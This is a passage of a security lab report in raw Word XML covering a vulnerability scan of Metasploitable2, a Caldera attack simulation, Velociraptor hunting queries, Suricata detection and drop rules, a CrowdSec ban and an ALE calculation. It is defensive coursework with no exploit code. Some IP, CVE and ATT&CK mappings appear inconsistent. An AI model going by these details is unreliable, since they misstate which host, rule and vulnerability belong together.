      </w:r>
    </w:p>
    <w:p w14:paraId="2E397A04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OpenVAS (Greenbone Vulnerability Manager) was configured to perform a full vulnerability scan against the Metasploitable2 target at 10.0.2.3. The scan identified multiple critical and high-severity vulnerabilities across FTP, SSH, HTTP, and database services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0AB448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230"/>
        <w:gridCol w:w="1081"/>
        <w:gridCol w:w="1097"/>
        <w:gridCol w:w="3561"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="525EB0E0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31D4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Vulnerability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6EEA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CVE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E6FE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CVSS Score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7FF0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0ABE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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="3FC46730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46EE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VSFTPD 2.3.4 Backdoor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01CA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CVE-2011-2523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78F4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1610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329B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Malicious backdoor allows remote command execution on port 6200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="488B9EA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77321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UnrealIRCd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Backdoor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898E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CVE-2010-2075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E763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9.8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9DA7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F1A2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Backdoor in IRC daemon enables unauthenticated RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="2765E94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2BEB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Samba MS-RPC Shell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A6B7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CVE-2007-2447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95B9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9.3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AB16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398B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Remote command execution via Samba </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>usermap_script</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="7D92192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382B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PostgreSQL Default Creds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98CB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CVE-2012-0975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89FE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7.5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B1CB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9558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Default credentials allow unauthorized database access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="4BBC05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CDDA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Apache Tomcat Weak Auth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0A89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CVE-2009-3548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0568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7.5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5A4A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AB2D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Default manager credentials expose admin console</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="42069A3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705D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OpenSSH Username Enum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824B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CVE-2018-15473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5FE0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5.3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F92E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2CC5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Username enumeration via authentication response timing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12583EE7" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E71D97D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 xml:space="preserve">2.3.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>DefectDojo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Vulnerability Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B18BBE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Scan results were imported into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>DefectDojo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> for centralized vulnerability management. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>DefectDojo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides CVSS scoring, deduplication, remediation tracking, and compliance reporting. The three highest-priority vulnerabilities for remediation are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464AD11D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015"/>
        <w:gridCol w:w="840"/>
        <w:gridCol w:w="3661"/>
        <w:gridCol w:w="1268"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="28A69549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51E4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6597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Vulnerability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3DAE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CVSS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1256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Remediation Plan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5ED8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Timeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="139AF878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9D64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P1 — Critical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F3E7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VSFTPD 2.3.4 Backdoor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B08D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EAB6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Upgrade to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3.0.5 or later; disable FTP service if unused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3121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Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="43DF697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3AD8D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lastRenderedPageBreak/>
              <w:t>P2 — Critical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D108F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UnrealIRCd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Backdoor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12C1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9.8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56F0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Remove </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>UnrealIRCd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> package; replace with patched IRC daemon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074D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Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="523EA75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EFD9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P3 — Critical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426A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Samba MS-RPC Shell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BE4E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9.3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9650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Patch Samba to 3.0.26a+; restrict access via firewall rules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4D79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48 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48A6DAB9" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4421B96F" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2.4 Incident Response Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD3A313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2.4.1 Phishing Attack Simulation with MITRE Caldera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E24023E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MITRE Caldera is an automated adversary emulation system that simulates real-world attack techniques. A mock phishing payload was deployed to simulate the initial access phase of an attack. The simulation followed the attack chain: email delivery (T1566) → user execution (T1204) → PowerShell execution (T1059.001) → persistence via scheduled task (T1053.005) → credential dumping (T1003).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0676E569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492"/>
        <w:gridCol w:w="1292"/>
        <w:gridCol w:w="1414"/>
        <w:gridCol w:w="2310"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="3609DDD9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B9B4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Attack Phase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1AE9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4AE7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MITRE ID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6584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6AE4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Artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="3ECBDCB6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09CE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Initial Access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F55C7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Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Attachment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A9EA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T1566.001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5C4C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Caldera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A40F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Email with malicious attachment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="0650558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F11C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Execution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ABD9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User Execution — Malicious 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814B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T1204.002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F4F3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Caldera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E438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Process creation event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="77B7B39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DCF3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Persistence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3738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Scheduled Task/Job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305B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T1053.005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FF06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Caldera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5DFC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Scheduled task registry key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="22A28A3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13B7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3F4A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Application Layer Protocol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DF7D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T1071.001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919D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Caldera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226A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HTTP beacon to C2 server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="569977C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C87B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Collection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F525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Data from Local System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7C6A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CBAB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Velociraptor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4450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CSV artifact export</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58961EAF" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1223FB4A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2.4.2 Artifact Collection with Velociraptor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096C05F3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Velociraptor forensic artifacts were collected using VQL (Velociraptor Query Language) queries to capture process and network state at the time of the simulated attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102CFA5F" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288DBFBE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-- Velociraptor Process Collection Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61019C76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SELECT Pid, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, Name, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CommandLine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CreateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15DC3CCD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FROM processes WHERE Name =~ '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>powershell|cmd|wscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D154776" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74633C2D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lastRenderedPageBreak/>
        <w:t>-- Network Connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E088109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SELECT Pid, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>LocalAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>RemoteAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, Status FROM netstat;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474B0552" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2417E678" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5 Network </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Open-Source Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F14E9A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2.5.1 Suricata IDS — Rule Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B614EF4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Suricata 8.0.5 was deployed in network IDS mode on the Kali Linux host (10.0.2.15) monitoring interface eth0. Custom detection rules were created in /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>/rules/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>local.rules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to detect FTP backdoor activity and block known malicious IPs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1E946B" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5330CC66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# Suricata Custom Rules — /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>/rules/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>local.rules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="121E44E4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drop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.3 any -&gt; any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>msg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>:"Block Malicious IP - Metasploitable2"; sid:1000001; rev:1;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E459E85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alert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; $HOME_NET 21 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>msg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">:"FTP Backdoor Attempt Detected"; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>flow:to_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>content:"USER</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>"; sid:1000002; rev:1;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDF16EE" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C7F6E4B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b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2.5.2 MITRE ATT&amp;CK Mapping — Suricata Alerts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138"/>
        <w:gridCol w:w="1828"/>
        <w:gridCol w:w="1036"/>
        <w:gridCol w:w="1464"/>
        <w:gridCol w:w="2018"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="1AC96088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7182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Alert (SID)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7439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Tactic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928E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354C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Source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9145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Destination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F101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Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="1EFAF561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905E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SID:1000001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3D66B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Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion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5918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T1562 — Disable/Modify Tools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BB20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10.0.2.3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A21F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Any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5F5F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Drop rule — block Metasploitable2 traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="31F6F44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4577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SID:1000002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D3AA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Initial Access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066F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T1190 — Exploit Public App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A2DE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Any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0B90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10.0.2.15:21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7633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FTP backdoor trigger via USER command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A0513F6" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FDBC6F7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 xml:space="preserve">2.5.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CrowdSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Community IPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6CE293" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CrowdSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.4.6 was deployed as a collaborative intrusion prevention system. After the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor exploitation was detected, the attacker IP was manually banned using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>cscli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> CLI tool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253CEA03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986"/>
        <w:gridCol w:w="1561"/>
        <w:gridCol w:w="2430"/>
        <w:gridCol w:w="925"/>
        <w:gridCol w:w="1316"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="56638F2D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A28F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Decision ID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173B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Source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0852D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b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Scope:Value</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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1DF7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Reason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5F8E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B4DC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Expiration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="4A214CBA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8A0E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29998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21C9A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cscli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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039D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Ip:10.0.2.15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84E58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vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> exploit detected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239E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ban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3DB5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24 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A894C0A" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00371EFD" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2.6 Risk Assessment Practice — ALE Calculation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAC6D0E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lastRenderedPageBreak/>
        <w:t>A quantitative risk assessment was performed for a ransomware attack scenario using the FAIR (Factor Analysis of Information Risk) methodology and ALE formula:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE0A52E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3342"/>
        <w:gridCol w:w="1402"/>
        <w:gridCol w:w="3548"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="555525BB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D979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CAF4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Variable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D1E9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A907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Formula</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="26B82C65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95647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C8B9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Asset Value (AV)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3EF9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$50,000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AE4C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Estimated value of affected systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="6F818D6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BE0D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DF3F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Exposure Factor (EF)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4623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20% (0.20)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86D2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Proportion of asset value lost per incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="3DBDC87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B50E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BCB0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Single Loss Expectancy (SLE)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93B0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$10,000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9D00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SLE = AV x EF = $50,000 x 0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="5716EB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0AB7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DCD9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Annualized Rate of Occurrence (ARO)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4F4E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0.2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3C34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Expected frequency = once every 5 years</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="69C6E7C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4115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956E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Annualized Loss Expectancy (ALE)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8774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$2,000/year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5771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ALE = SLE x ARO = $10,000 x 0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
